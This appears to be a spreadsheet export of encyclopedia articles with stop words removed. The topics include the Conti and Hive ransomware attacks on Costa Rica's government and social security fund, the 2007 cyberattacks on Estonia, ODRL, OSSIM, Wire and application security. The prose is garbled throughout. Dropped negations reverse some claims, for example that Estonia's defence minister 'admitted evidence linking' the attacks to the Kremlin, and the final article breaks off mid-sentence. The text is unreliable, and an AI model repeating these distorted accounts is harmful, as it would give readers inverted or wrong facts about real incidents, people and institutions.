institutions paper systems recovered. that month hive also attacked central bank zambia; however, entity refused ransom, stating means recover systems, entered extortionists' chat provided link "dick pic" message: suck dick stop blocking banking networks thinking monetize something, learn monetize attacks conti group attack servers ministry finance first compromised night sunday, april bettercyber twitter account first replicate, next day, post conti group forum reported hacking government institution, indicating terabyte information stolen virtual administration (atv) platform, used government citizens companies file returns. turn, publication indicated data would begin published april 23.before a.m. april ministry finance informed press release social networks that, "due technical problems", platform customs information system (tica) disabled deadline filing paying taxes would extended next business systems restored. institution immediately acknowledge hacked initially refused answer questions press conti group claim.the next day, conti group posted post forum announcing asking us$10 million ransom stolen information. ministry finance confirmed information published corresponded information national customs service, used supplies support. relation communications detected social networks, classified hacking, ministry finance communicates following: indeed, since early today facing situation servers, attended staff external experts, last hours tried detect repair situations occurring. this ministry made decision allow investigation teams carry in-depth analysis information systems, made decision temporarily suspend platforms tica, services restarted teams complete analyses. last hours, exposure data belonging general directorate customs detected, carrying information investigation processes, established response plan. data identified historical nature used national customs service inputs support. hours treasury statement, microsite ministry science, innovation, technology telecommunications suffered defacement message reading, greet conti, look network."jorge mora flores, director digital governance costa rica, indicated result attack, affected server hosts pages, decision made turn checks carried determine extent security breached. subsequently, update conti group forum indicated attacks costa rican ministries would continue "until government pays us".hours later, conti attacked email server national meteorological institute, stealing information contained therein. conti stated scenario costa rica experiencing "beta version global cyber attack entire country". later, another update forum, indicated ministry finance inform taxpayers happening, would carry additional actions: minister cannot explain taxpayers going will: penetrated critical infrastructure, gained access servers, downloaded databases internal documents, databases mssql format, email, first name, last name... minister considers information confidential, publish leak problem ministry's main problem, backups also encrypted, infrastructure probably able restored backdoors large number ministries private companies. significantly small amount spend future. their export business already trouble they've already lost million could paid later day, costa rican government denied received ransom request, despite conti group's forum post regarding us$10 million. april conti published additional information stolen ministry finance. afternoon, government called press conference presidential house argued situation control, addition treasury, micitt imn, radiografía costarricense s.a. (racsa), state internet service provider, attacked internal email server breach. meantime, costa rican social security fund reported suffered cyber attack human resources site, combated. conti group claim responsibility attack, since fund reported hours later sensitive information stolen insured, medical history contributions pension health insurance, databases left behind intact.the minister presidency, geannina dinarte romero, indicated case international organized crime government costa rica would ransom. also announced receiving technical assistance governments united states, israel spain, well microsoft, operated servers ministry finance.early april conti group attacked servers ministry labor social security, well social development family allowances fund. preliminary report government indicated information emails data pension payments social institutions stolen. likewise, group offered discount amount ransom demanded government costa rica made prompt payment. before noon, ministry science, innovation, technology telecommunications held press conference government reiterated position paying ransom demanded conti group, hours later criminal group announced would immediately begin publishing stolen information, urging costa rican cybercriminals take advantage commit phishing. president carlos alvarado quesada gave first public statement hack day. reiterate costa rican state will anything cybercriminals. opinion attack matter money, rather seeks threaten stability country, situation transition. this always done, person earth part defend costa rica. afternoon, government issued directive addressed public sector order protect proper functioning, confidentiality cybersecurity public institutions. document provides that, event situation affects confidentiality, availability integrity services available public, continuity institutional functions, identity theft institution social networks—even within institution considered control—the computer security incident response center (csirt-cr) must informed event. addition, agencies required back information regarding incident investigations. likewise, institutions must carry maintenance telecommunications infrastructure—whether public employees private contractors—including regular updates institutional systems, changing passwords institutional systems networks, disabling unnecessary services ports, monitoring network infrastructure, well taking heed alerts csirt-cr. guideline also orders vulnerability scan carried least twice year official websites government costa rica.on morning april government reported conti group attacks country recorded since previous day. however, director digital governance, jorge mora, explained since monday, began take preventive measures state institutions, detected 35,000 malware communication requests, 9,900 phishing incidents, 60,000 attempts take remote control systems, 60,000 attempts mine cryptocurrencies using computer infrastructure first state institutions intervened.on april conti group attacked administrative board municipal electrical service cartago, public company charge electricity supply province cartago. jorge mora flores reported subscriber information could compromised; next day, reported institution's accounting human resources information encrypted part attack.on april conti announced would shift strategy attacking state institutions focus large companies private sector; addition, would stop announcing hacks deep page focus requesting ransoms stolen encrypted information.on april micitt reported website sede interuniversitaria alajuela, multi-university campus, attacked; addition, attempt breach servers rural development institute, effectively repelled. april government reported hacking attempt ministry economy, industry commerce later national liquor factory municipalities turrialba golfito.on another hacking attempt reported ministry justice peace (mjp), although rebuffed. next day, unsuccessful cyberattacks reported municipalities garabito alajuelita, well josé social protection board, national charitable organization administers country's national lottery.on micitt reported hacking attempts national education loan commission cartago university college (cuc), although latter conti's responsibility. nearly months original attack, june ministry finance announced system would restarted june costa ricans could make payments. june systems disabled conti attacks restored: tica (spanish: tecnología información para control aduanero, customs control information technology) exonet, platform used manage process exemption requests. hive ransomware group attack morning (utc-6:00), costa rican social security fund (ccss) detected anomalous information flows systems began receive reports different hospitals unusual behavior various computers; immediately proceeded turn critical systems, including single digital health file (expediente digital único salud, edus) centralized collection system. some printers institution printed messages random codes characters, others printed default instructions hive ransomware group regain access systems.in press conference noon, ccss officials described attack "exceptionally violent" detailed first incidents recorded vicente paul hospital, province heredia hospital liberia, province guanacaste; there, attacks carried hospitals greater metropolitan area. president ccss, álvaro ramos chaves, affirmed databases sensitive information compromised noted least thirty servers 1,500 institution has) contaminated ransomware. added plan restore systems, would take time piece equipment reviewed ensure hackers longer access.as consequence, number insured persons medical appointments cancelled. ccss medical centers resort running paper, digital backup system, digital file contingency environment (expediente digital ambiente contingencia, edac), also taken security measure, situation could remain several days. medical facilities left without access edus, edac, systems including hospital occupancy control system (arca) billing. financial areas ccss unable systems including centralized collection system (sicere), disability control payment registry (rcpi), integrated voucher system (sico). offices administrative areas unable computers; teleworkers could access office (word, excel, powerpoint, outlook, teams).in total, first effects cyberattack, 4,871 users missed medical appointments, another 12,000 missing appointments next day. ccss reported laboratory service affected, percent operating normally percent partially affected. review health establishments showed hospital services operated contingency plan, outpatient consultations partially affected, radiology medical imaging services partially affected, pharmacy services affected.on june press conference presidential palace, executive president ccss, álvaro ramos chaves, announced opening administrative investigation agency's information technology department hack, determine negligence. president chaves robles noted fewer ccss computers microclaudia system donated spain installed conti attacks. ramos chaves also revealed effects attack times greater reported first day: servers 9,000 end-user computers affected, making impossible restore systems within week initially planned.on june hive ransomware group requested million bitcoin ccss could services back.on june superintendency pensions (supen) announced suspension notice possibility freely transferring complementary pension funds different operators, since required ccss systems affected hack.given fall systems reporting payroll payment social contributions, ccss extend june deadline employers submit payroll corresponding month may. likewise, announced self-employed voluntary insured workers would able monthly installments impossibility making corresponding invoice. pension scheme disability, death (ivm) enable bank accounts specific email accounts people mortgage loans could monthly payments report installments. likewise, health establishments ccss telephone lines population answer questions regarding continuity services status medical appointments. declaration emergency april president-elect costa rica, rodrigo chaves robles, announced intention declare national state emergency assumed power cyberattacks country's public sector.on costa rican chamber industries (cicr), national chamber freight carriers (canatrac), costa rican chamber foreign trade (crecex), chamber fiscal general deposit warehouses (camalfi), costa rican chamber shippers (nave), chamber exporters costa rica (cadexco) association customs agents (aaacr) requested declare state emergency situation country's customs result conti hack; warned within days, situation improve, costa rica could face paralysis international trade accumulation cargo containers, since customs carry procedures paper, raising wait three even four days receive approval move containers.on upon assuming power, chaves robles signed executive decree 43542-mp-micitt, declaring state national emergency cyberattacks public sector costa rica ordered presidency republic take control coordination national response, lieu national emergency commission, manages situations declared national emergency.on president chaves affirmed country state conti's hacks denounced nationals helping "terrorist group" previous weekend threatened overthrow newly elected government. know, information paying taxes right wrong. there huge impact international trade process since customs tica system working. know country's budget execution progressing: costa rica know much budget person spending, whether going not. paying salaries almost blindly based previous payrolls, represents huge challenge future. what happens someone surpasses extraordinary staff repeating payroll? there people paid less state using forms. this represents huge risk systems flexible recover excess payments. institutions attacked institutions affected, including ministry finance, receives income makes expenses state. they want drown financial system state's public finances. next day, dozens workers ministry public education (mep) took streets protest non-payment salaries— payments less due, among problems related impossibility updating state payroll hack. estimated 16,000 workers affected, 3,000 receive payments all. ministry finance, contingency measure, provided tool filled hand update employee payments.on protests, unions negotiated government, promised amounts owed subsequently recover sums overpaid workers. constitutional chamber supreme court justice upheld recursos amparo filed state workers affected payment salaries ordered contingency measures reconcile payments within month. government announced finance ministry paid billion colones extraordinary payroll corresponding 25,618 movements pending cancellation hack. references</t>
  </si>
  <si>
    <t>ODRL</t>
  </si>
  <si>
    <t>open digital rights language (odrl) policy expression language provides flexible interoperable information model, vocabulary, encoding mechanisms representing statements usage content services. odrl became endorsed recommendation 2018.an example odrl policy follows, simply interpreted "john play asset mysong.mp3". odrl history odrl initially created 2000, address burgeoning needs drm-sector media players first introduced marketplace. version odrl language quickly adopted open mobile alliance (oma) core standard mobile media content protections managing digital objects. date, odrl arguably largest mobile implementation rights language, currently operating billion compatible devices. odrl managed independent initiative, hosted systems renato iannella, becoming community group 2011. this move provided long-term stability specifications transparent governance model. 2013, media sectors adopted odrl: ebook publishing news industries. international press telecommunication council (iptc) news consortium adopted odrl communication usage policies, primarily association licensed distribution news content online news marketplace. current virtual goods environment, content assets purchased permissioned consumer often locked platform content initially consumed interoperability rights expressions across platforms. odrl version recognized equally important state permissions prohibitions expression language representing non-drm digital objects, broad adoption advanced model reduce friction across digital devices enable transparent transactions machines accordance specified policy language. odrl policy model framework currently supports traditional rights expressions commercial transactions, open access expressions, privacy expressions social media. odrl specifications profiles odrl specified world wide (w3c) recommendations published february 2018: odrl information model odrl vocabulary expression 2.2included within odrl documentation number basic cases demonstrating implement policy expressions using core model terms common vocabulary. odrl fully extensible provides mechanism communities extend and/or deprecate odrl common vocabulary used conjunction core model. example odrl profile vocabulary extended found iptc rightsml profile. robust framework odrl allows wide variety business models expressed address requirements multiple communities, social networks, publishers, image libraries, education. other profiles, odrl profile creative commons developed. odrl community group world wide (w3c) community group still supports promotion future development odrl recommendations. other community groups adopted odrl core policy language developed profile meet community requirements, rights automation market data community group pricing trading data financial instruments. odrl core model odrl core model, policy central entity holds odrl policy together. encoded form, e.g. json document, makes policy addressable outside world unique attribute. policy refer multiple permissions, duties prohibitions. permission allows particular action executed related asset, e.g. “play audio file abc.mp3″. constraint like times” might added specify permission precisely. party grants permission linked role assigner, party granted permission linked role assignee, e.g. “assigner virtualmusicshop grants permission assignee alice”. additionally, permission linked duty entities means obligations assigner fulfil order exercise permission. similar permissions, duty states certain action executed party role assignee permission valid, e.g. “alice must order permission play abc.mp3″. prohibition entity used permission, difference forbids action, e.g. “alice forbidden abc.mp3 commercially”. odrl vocabulary odrl core vocabulary defines semantics concepts terms odrl information model. odrl core vocabulary represents minimally supported terms odrl policies. addition, odrl common vocabulary defines semantics generic terms optionally used odrl profiles communities. odrl encodings odrl implemented three serializations: json, xml, turtle. communities adopting odrl standardized actions permissions, prohibitions, duties expressed policy statements. also creative commons rights expression language mpeg-21 rights expression language references external links permission obligations expression working group http://www.w3.org/community/odrl/ odrl community group, international effort develop promote odrl iptc rightsml standard http://virtualgoods.org/ conference regularly hosts odrl workshop http://xml.coverpages.org/odrl.html cover pages article odrl https://copyrightandtechnology.com/2018/02/18/world-wide-web-consortium-embraces-odrl-rights-language/ world wide consortium embraces odrl rights language</t>
  </si>
  <si>
    <t>Anti-Phishing Working Group</t>
  </si>
  <si>
    <t>anti-phishing working group (apwg) international consortium attempts eliminate fraud identity theft caused phishing related incidents brings together businesses affected phishing attacks: security products services companies, enforcement agencies, government agencies, trade association, regional international treaty organizations communications companies. founded 2003 david jevans, apwg 3200+ members 1700 companies agencies worldwide. member companies include leading security companies kaspersky lab, bitdefender, symantec, mcafee, verisign, ironkey internet identity. financial industry members include group, visa, mastercard american bankers association. also scareware phishtank references external links apwg official website</t>
  </si>
  <si>
    <t>Notifier</t>
  </si>
  <si>
    <t>notifier notifier honeywell manufacturer engineered fire alarm systems distributors worldwide, regional support operations every continent. notifier headquartered northford, connecticut, united states, division honeywell life safety group. history notifier founded 1949 waverly, nebraska oliver joy, along wife margaret joy, acted executive vice president. company moved lincoln, nebraska 1956, 1962 selected provide fire detection system seattle world's fair. company sold emhart corporation 1968 acquired pittway corporation 1987. notifier moved northford, connecticut 1988, 1999 honeywell international, inc. purchased pittway corp., notifier became part honeywell life safety group. also fire alarm system sensor fire alarm control panel references external links notifier</t>
  </si>
  <si>
    <t>OSSIM</t>
  </si>
  <si>
    <t>ossim (open source security information management) open source security information event management system, integrating selection tools designed network administrators computer security, intrusion detection prevention. project began 2003 collaboration dominique karg, julio casal later alberto román. 2008 became basis company alienvault. following acquisition eureka project label completion r&amp;d, alienvault began selling commercial derivative ossim ('alienvault unified security management'). alienvault acquired at&amp;t communications renamed at&amp;t cybersecurity 2019.ossim four major-version releases since creation 5.x.x version numbering. information visualization contributions source code ossim published years ossim. project approximately million lines code. current version ossim 5.7.5 released september 2019. information release past versions found siem system, ossim intended give security analysts administrators complete view security-related aspects system, combining management extended plugins asset management discovery information dedicated information security controls detection systems. this information correlated together create contexts information visible piece alone. alarm availability views along reporting capabilities provided enhance capabilities tool utility security systems engineers. ossim performs functions using well-known open-source software security components, unifying single browser-based user interface. interface provides graphical analysis tools information collected underlying open source software component (many command line tools otherwise plain text file) allows centralized management configuration options. software distributed freely general public license. unlike individual components installed onto existing system, ossim distributed installable image designed deployed physical virtual host core operating system host. ossim built using debian underlying operating system. core platform open additional components abilities added extend security administrators using standard packages scripting needed. components ossim features following software components: prads, used identify hosts services passively monitoring network traffic. added release v4.0. snort, used intrusion detection system (ids), also used cross correlation openvas. suricata, used intrusion detection system (ids), version used default configuration tcptrack, used session data information grant useful information attack correlation. munin, traffic analysis service watchdogging. nfsen/nfdump, used collect analyze netflow information. fprobe, used generate netflow data captured traffic. nagios, used monitor hosts specified ports asset availability well full local system monitoring. openvas, used vulnerability assessment associated assets. ossim also includes self developed tools, important generic correlation engine logical directive support logs integration plugins.note: suricata snort cannot used time. snort currently phased favor suricata. deprecated components arpwatch, used address anomaly detection, replaced prads. p0f, used passive detection change analysis, replaced prads. pads, used service anomaly detection, replaced prads. ntop, recording traffic patterns hosts host groups, statistics protocol usage, deprecated. open threat exchange alienvault maintains crowd-sourced service reputation information, generated (and available anyone) active ossim installation. uses tokenized information participating ossim installations identify internet addresses engaged malicious activities share information ossim installations. launched 2012 external links official website official forum official source code references</t>
  </si>
  <si>
    <t>Wire (software)</t>
  </si>
  <si>
    <t>wire encrypted communication collaboration created wire swiss. available ios, android, windows, macos, linux, browsers firefox. wire offers collaboration suite featuring messenger, voice calls, video calls, conference calls, file-sharing, external collaboration –all protected secure end-to-end-encryption. wire offers three solutions built security technology: wire –which offers wire's collaboration feature businesses, wire enterprise –includes wire capabilities added features large-scale regulated organizations, wire –the on-demand crisis collaboration suite. they also offer wire personal, secure messaging personal use. history skype's co-founder janus friis helped create wire many wire employees previously worked skype. wire swiss gmbh launched wire december 2014. august 2015, company added group calling app. from launch march 2016, wire's messages encrypted client company's server. march 2016, company added end-to-end encryption messaging traffic, well video calling feature. wire swiss gmbh released source code wire client applications july 2016. 2018, wire launched collaboration solution featuring end-to-end encrypted chat, conferencing, video calls file-sharing desktop mobile businesses. features wire offers end-to-end encrypted messaging, file-sharing, video voice calls, guest rooms external communication.the allows group calling twenty-five participants video conferences support people. stereo feature places participants "virtual space" users differentiate voice directionality. application adapts varying network conditions. application supports exchange animated gifs media integration giphy. android versions also include sketch feature allows users draw sketch conversation photo.wire available mobile, desktop web. service called wire web. wire activity synced ios, android apps. desktop version supports screen sharing.wire's technology solution deployed either cloud, private cloud on-premises.one latest features rolled wire secure external collaboration capability called 'guest room'. wire's secure guest rooms feature extends end-to-end encryption conversations external parties without requiring register, even download anything.wire also includes function ephemeral messaging group conversations. technical wire provides end-to-end encryption features. wire's instant messages encrypted proteus, protocol wire swiss developed based signal protocol. wire's voice calls encrypted dtls srtp. addition this, client-server communication protected transport layer security.wire currently midst working develop messaging layer security (mls), protocol designed facilitate secure enterprise messaging platforms internet engineering task force (ietf). 2016, ietf meeting berlin, wire proposed standard protected modern security properties could used companies large small. during interview dark reading, raphael robert, head security wire, mentioned messaging layer security (mls) ready integrate messaging platforms 2021.wire's source code accompanied gplv3 readme file states number additional restrictions specified wire terms take precedence. among things, users compiled applications change connects interacts company's centralised servers. security wire implemented security design approach, security privacy core values. wire 100% open source source code available github, independently audited, iso, ccpa, gdpr, sox-compliant.in december 2016, wire's whitepapers reviewed security researcher university waterloo. researcher praised wire open approach security, identified serious issues still need addressing. these included man-in-the-middle attack voice video communications, possible audio video leakage depending unspecified codec parameters, fact user passwords uploaded wire's servers, significant attack surface code replacement desktop client, fact server open-sourced, time article written. researcher described security wire weak comparison signal, also depicted problems surmountable. wire's developers announced addition end-to-end authentication wire's calls march 2017, started open-sourcing wire's server code april 2017. march 2017, review updated conclusion "the remaining issues wire relatively minor also affect many competitors." however, major issue remained detailed "the wire client authenticates central server order provide user presence information. (wire attempt hide metadata, central server promising much information.) wire whitepapers spend unusual amount space discussing engineering details part protocol. however, method authentication web: wire client sends unencrypted, unhashed password central server tls, server hashes plaintext password scrypt, hash compared hash stored server. this process leaks user's password central server; server operators anyone compromises server) could plaintext passwords users authenticate."on february 2017, kudelski security d-sec published joint review wire's encrypted messaging protocol implementation. non-critical issues found potential leading degraded security level. review found "invalid public keys could transmitted processed without raising error." report also recommended security improvements implemented address thread-unsafety risks sensitive data memory. wire's developers said "the issues discovered review fixed deployed android. deployment ongoing wire desktop apps."in 2017, wire published article going implementation end-to-end encryption multi-device scenario response anonymous accounts social media publishing misleading information security.in 2017, motherboard published article saying wire servers "keep list users customer contacted delete account". wire swiss confirmed statement accurate, saying keep data order "help syncing conversations across multiple devices", might change approach future. awards july 2019, wire capterra's best ease award team communication software category solution. later year october, wire recognized cybersecurity breakthrough awards first-ever secure communications solution year awardee. february 2020, wire cybersecurity excellence awards following categories: fastest-growing cybersecurity company, best start-up (eu), open-source security, encryption, zero-trust security. simultaneously, cyber defense magazine announced wire best messaging security 2020 special edition cyber defense awards. privacy policy changes late 2019, wire holding moved luxembourg according thinkprivacy critics made unclear much jurisdiction united states wire data. some people considered especially problematic wire stores unencrypted meta data every user. time transfer wire also changed privacy policy "sharing user data required law" "sharing user data necessary", seen critics unclear determination could also mean increasing profits, co-operation enforcement reason.the wire group holding moved back germany 2020. business model wire swiss gmbh receives financial backing firm called iconical.in july 2017, wire swiss announced beta version end-to-end encrypted team messaging platform. october 2017, wire officially released team messaging platform subscription-based communication solution businesses 2019, announced ernst young chose wire develop self-hosted, secure collaboration communication platform. also comparison instant messaging clients comparison voip software list video telecommunication services product brands gartner market guide workstream collaboration forrester wave™: secure communications references</t>
  </si>
  <si>
    <t>Artificial Intelligence for Digital Response</t>
  </si>
  <si>
    <t>artificial intelligence digital response (aidr) free open source platform filter classify social media messages related emergencies, disasters, humanitarian crises. developed qatar computing research institute awarded grand prize 2015 open source software world challenge.muhammad imran stated team "have developed novel computational techniques technologies, help gain insightful actionable information online sources enable rapid decision-making" according system "combines human intelligence machine learning techniques, solve many real-world challenges mass emergencies health issues". used logging ones twitter credentials collecting tweets specifying keywords hashtags, like #chileearthquake, possibly geographical region well. deployed conjunction unicef zambia classify short messages related aids/hiv received u-report platform.aidr used first time 2010 pakistan floods. first real test aidr took place 2014 iquique earthquake chile. related talks events muhammad imran delivered keynote talk science behind aidr system international conference information systems crisis response management (iscram). abdelkader lattab lucas also presented system 2016 qcri-ibm data science connect event. also crowdmapping digital humanitarianism social media analytics social media mining references external links official website aidr github</t>
  </si>
  <si>
    <t>CodeCon</t>
  </si>
  <si>
    <t>codecon annual conference software hackers technology enthusiasts, held every year 2002 2009. codecon intended computer security conference, conference focus software developers presentations technologies, computer programs, rather products. history bram cohen sassaman credited devising organizing first conference lounge francisco, california 2002. conference result discussion building small, programmer-focused convention. some projects discussed first codecon include bittorrent peek-a-booty. there also panel discussions, including legality hacking, focused actions mpaa riaa peer-to-peer file sharing networks.later conferences included discussions p2p, helios voting system.sassaman proposed then-girlfriend meredith patterson presentation 2006 codecon; later married. other uses bloomberg's codecon programming contest platform events.an abbreviation re/code's code conference. references external links codecon website wayback machine (archived july 2011)</t>
  </si>
  <si>
    <t>CodeChef</t>
  </si>
  <si>
    <t>code-chef online educational program competitive programming community global programmers. code-chef started educational initiative 2009 directi, indian software company. 2020, became owned unacademy. along monthly coding contests community, code-chef initiatives schools, colleges women competitive programming. hosted india regionals icpc college students, well international olympiad informatics (ioi), school students india. most parts code-chef available without charge, advanced features require monthly subscription, history 2010, directi launched code-chef help programmers improve problem-solving skills active participation programming contests. goal strengthen problem-solving skills fostering friendly competition community engagement.in july 2010, organization launched gold" initiative, enabling indian teams excel world finals international collegiate programming contest (formerly known acm-icpc).in july 2013, inaugurated "code-chef schools" program foster programming talent school students. initiative hopes enable indian students excel international olympiad informatics (ioi). competition requires contestants show necessary skills problem analysis, algorithm data structure design, programming, testing.in november 2017, first code-chef certification exam conducted. 2018, organization launched codechef business target technology enterprises. 2020, ownership changed directi (founded bhavin turakhia) unacademy (gaurav munjal, ceo). references</t>
  </si>
  <si>
    <t>Application portfolio attack surface</t>
  </si>
  <si>
    <t>realm application security, term application portfolio attack surface apas, refers collective risk organization posed total security vulnerabilities found within mission critical systems software organization enterprise. references</t>
  </si>
  <si>
    <t>2007 cyberattacks on Estonia</t>
  </si>
  <si>
    <t>beginning april 2007, series cyberattacks targeted websites estonian organizations, including estonian parliament, banks, ministries, newspapers broadcasters, amid country's disagreement russia relocation bronze soldier tallinn, elaborate soviet-era grave marker, well graves tallinn. most attacks influence general public distributed denial service type attacks ranging single individuals using various methods like ping floods expensive rentals botnets usually used spam distribution. spamming bigger news portals commentaries defacements including estonian reform party website also occurred. research also shown large conflicts took place edit english-language version bronze soldier's wikipedia page.some observers reckoned onslaught estonia sophistication seen before. case studied intensively many countries military planners time occurred, second-largest instance state-sponsored cyberwarfare, following titan rain.as january 2008, ethnic-russian estonian national charged convicted.during panel discussion cyber warfare, sergei markov russian state duma stated unnamed aide responsible orchestrating cyber attacks. markov alleged aide acted residing unrecognised republic former soviet union, possibly transnistria. march 2009 konstantin goloskokov, "commissar" kremlin-backed youth group nashi, claimed responsibility attack. experts critical varying claims responsibility. direct result cyberattacks creation nato cooperative cyber defence centre excellence tallinn, estonia. estonia's response estonian government quick blame kremlin, accusing directly involved attacks. later revealed allegations completely correct estonia's defense minister, jaak aaviksoo, admitted evidence linking cyber-attacks kremlin. course, moment, cannot state certain cyber-attacks managed kremlin, russian government agencies," jaak aaviksoo said interview estonia's kanal channel. "again, possible without doubt orders came kremlin, that, indeed, wish expressed thing there," said aaviksoo. russia called accusations involvement "unfounded", neither nato european commission experts able find proof official russian government participation. since attack, estonia advocated increased cybersecurity protection response protocol. nato's response response attacks, nato conducted internal assessment cyber security infrastructure defenses. assessment resulted report issued allied defense ministers october 2007. developed creation cyber defense policy creation nato cooperative cyber defence center excellence (ccdcoe) 2008. attacks, tallinn manual international applicable cyber warfare also developed. this report outlined international laws considered applicable cyber realm. manual includes total ninety-five "black-letter rules" addressing cyber conflicts. tallinn manual worked provide global norm cyber space applying existing international cyber warfare. manual suggests states sovereignty internet, sovereignty components internet territory. legalities 2007, criminal investigation opened attacks section estonian penal code criminalising computer sabotage interference working computer network, felonies punishable imprisonment three years. number attackers turned within jurisdiction russian federation, 2007, estonian public prosecutor's office made formal investigation assistance request russian federation's supreme procurature mutual legal assistance treaty (mlat) existing estonia russia. russian state duma delegation visiting estonia early regards situation surrounding bronze soldier tallinn promised russia would investigation every available. june, russian supreme procurature refused assistance, claiming proposed investigative processes covered applicable mlat. piret seeman, estonian public prosecutor's office's officer, criticized decision, pointing requested processes actually enumerated mlat.on january 2008, dmitri galushkevich, student living tallinn, found guilty participating attacks. fined 17,500 kroons (approximately us$1,640) attacking website estonian reform party.as december 2008, russian authorities consistently denying estonian enforcement investigative cooperation, thus effectively eliminating chances perpetrators fall within russian jurisdiction brought trial. opinions experts critical systems whose network addresses would generally known targeted, including serving telephony financial transaction processing. although computer crackers behind cyberwarfare unveiled, experts believed efforts exceed skills individual activists even organised crime require co-operation state large telecom company.a well known russian hacker sp0raw believes efficient online attacks estonia could carried without blessing russian authorities hackers apparently acted "recommendations" parties higher positions. time called claims estonians regarding direct involvement russian government attacks "empty words, supported technical data".mike witt, deputy director united states computer emergency readiness team (cert) believes attacks ddos attacks. attackers used botnets—global networks compromised computers, often owned careless individuals. "the size cyber attack, certainly significant estonian government, technical standpoint something would consider significant scale," witt said.professor james hendler, former chief scientist pentagon's defense advanced research projects agency (darpa) characterised attacks "more like cyber riot military attack.""we directly visible info sources can't confirm deny attacks coming russian government," jose nazario, software security engineer arbor networks, told internetnews.com. arbor networks operated atlas threat analysis network, which, company claimed, could "see" internet traffic. nazario suspected different groups operating separate distributed botnets involved attack. experts interviewed security resource searchsecurity.com "say unlikely case government launching coordinated cyberattack another": johannes ullrich, chief research officer bethesda said "attributing distributed denial-of-service attack like government hard." well group herders showing 'patriotism,' kind like defacements us-china spy-plane crisis 2001]." hillar aarelaid, manager estonia's computer emergency response team "expressed skepticism attacks russian government, noting estonians also divided whether right remove statue"."today security analysts widely believe attacks condoned kremlin, actively coordinated leaders." andy greenberg, author wired guide cyberwar august 2019. noted next year, 2008, similar attacks georgia accompanied russian physical invasion. wired.com.clarke knake report upon estonian authorities informing russian officials traced systems controlling attack russia, indication response incensed patriotic russians might acted own. regardless conjectures official involvement, decision russian authorities pursue individuals responsible—a treaty obligation—together expert opinion russian security services could readily track culprits desire, leads russia observers conclude attacks served russian interests. 2012, atlantic council convened retrospective conference, "building secure cyber future: attack estonia, five years cyber-experts involved conflict discussed lessons learned field cyber-conflict changed estonian attack following year's attack georgia. conference organized jason healey, director atlantic council's cyber statecraft initiative, featured talks jaan priisalu, director general estonia's information system authority; bill woodcock, american cybersecurity expert assisted defense; jonatan vseviov, minister defense subsequently ambassador united states; heli tiirmaa-klaar, estonian ambassador-at-large cybersecurity; others. priisalu discussed attack's impact estonian financial system, woodcock described methods estonian cert used coordinate defensive actions network operators counterparts neighboring countries, vseviov talked broader societal implications attack, nato's article obligations. claiming responsibility attacks commissar nashi pro-kremlin youth movement moldova transnistria, konstantin goloskokov (goloskov sources), admitted organizing cyberattacks estonian government sites. goloskokov stressed, however, carrying order nashi's leadership said fellow nashi members criticized response harsh.like countries, estonia recognise transnistria, secessionist region moldova. unrecognised nation, transnistria belong interpol. accordingly, mutual legal assistance treaty applies. residents transnistria responsible, investigation severely hampered, even investigation succeeds finding likely suspects, legal recourse estonian authorities limited issuing all-eu arrest warrants suspects. such would largely symbolic. head russian military forecasting center, colonel anatoly tsyganok confirmed russia's ability conduct attack stated: "these attacks quite successful, today alliance nothing oppose russia's virtual attacks", additionally noting attacks violate international agreement. influence international military doctrines attacks triggered number military organizations around world reconsider importance network security modern military doctrine. june 2007, defence ministers nato members held meeting brussels, issuing joint communiqué promising action autumn 2007. nato's cooperative cyber defence centre excellence (ccdcoe) established tallinn 2008.on june 2007, estonian president toomas hendrik ilves president george bush. among topics discussed attacks estonian infrastructure. events reflected nato department public diplomacy short movie cyberspace. also bronze night cyberattacks 2008 south ossetia fatal system error russian influence operations estonia references external links cyber estonia attacked russia, kertu ruus, european affairs: volume number issue number winter/spring 2008. estonian attacks cyber riot, warfare, bill brenner, august 2007. black 2007: estonia: information warfare strategic lessons, gadi evron, 2007. estonia urges firm nato response form warfare: cyber-attacks massive ddos attacks target estonia; russia accused cyberattack estonia stirs fear 'virtual war' archived october 2008 wayback machine estonia accuses russia 'cyberattack' virtual harassment, real digital fears emerge after data siege estonia urged deepen cooperation estonia cyber-attacks cyber pirates hitting estonia estonia 'moscow cyber war' analysis: cyber smacked estonia? shaun waterman, hackers take wired country europe joshua davis, wired, 2007-08-21. georgetown journal international affairs report battling botnets online mobs gadi evron wrote postmortem analysis attacks estonian cert</t>
  </si>
  <si>
    <t>Application security</t>
  </si>
  <si>
    <t>application security (short appsec) includes tasks introduce secure software development life cycle development teams. final goal improve security practices and, that, find, preferably prevent security issues within applications. encompasses whole application life cycle requirements analysis, design, implementation, verification well maintenance. approaches different approaches find different subsets security vulnerabilities lurking application effective different times software lifecycle. they represent different tradeoffs time, effort, cost vulnerabilities found. design review. before code written application's architecture design reviewed security problems. common technique phase creation threat model. whitebox security review, code review. this security engineer deeply understanding application manually reviewing source code noticing security flaws. through comprehension application, vulnerabilities unique application found. blackbox security audit. this application testing security vulnerabilities, source code required. automated tooling. many security tools automated inclusion development testing environment. examples automated dast/sast tools integrated code editor ci/cd platforms. coordinated vulnerability platforms. these hacker-powered application security solutions offered many websites software developers individuals receive recognition compensation reporting bugs. application security application security branch information security deals specifically security websites, applications services. high level, application security draws principles application security applies specifically internet systems.web application security tools specialized tools working http traffic, e.g., application firewalls. security threats open application security project (owasp) provides free open resources. non-profit called owasp foundation. owasp 2017 published result recent research based comprehensive data compiled partner organizations. from data, approximately million vulnerabilities discovered across 50,000 applications. according owasp 2021, critical application security risks include: broken access control cryptographic failures injection insecure design security misconfiguration vulnerable outdated components identification authentification failures software data integrity failures security logging monitoring failures* server-side request forgery (ssrf)* tooling security testing security testing techniques scour vulnerabilities security holes applications. these vulnerabilities leave applications open exploitation. ideally, security testing implemented throughout entire software development life cycle (sdlc) vulnerabilities addressed timely thorough manner. there many kinds automated tools identifying vulnerabilities applications. common tool categories used identifying application vulnerabilities include: static application security testing (sast) analyzes source code security vulnerabilities application's development. compared dast, sast utilized even application executable state. sast access full source code white-box approach. this yield detailed results result many false positives need manually verified. dynamic application security testing (dast, often called vulnerability scanners) automatically detects vulnerabilities crawling analyzing websites. this method highly scalable, easily integrated quick. dast tools well suited dealing low-level attacks injection flaws well suited detect high-level flaws, e.g., logic business-logic flaws. fuzzing, tools commonly used input testing. interactive application security testing (iast) assesses applications within using software instrumentation. this combines strengths sast dast methods well providing access code, http traffic, library information, backend connections configuration information. some iast products require application attacked, others used normal quality assurance testing. runtime application self-protection augments existing applications provide intrusion detection prevention within application runtime. dependency scanners (also called software composition analysis) detect usage software components known vulnerabilities. these tools either work on-demand, e.g., source code build process, periodically. abstraction idea making complex things less 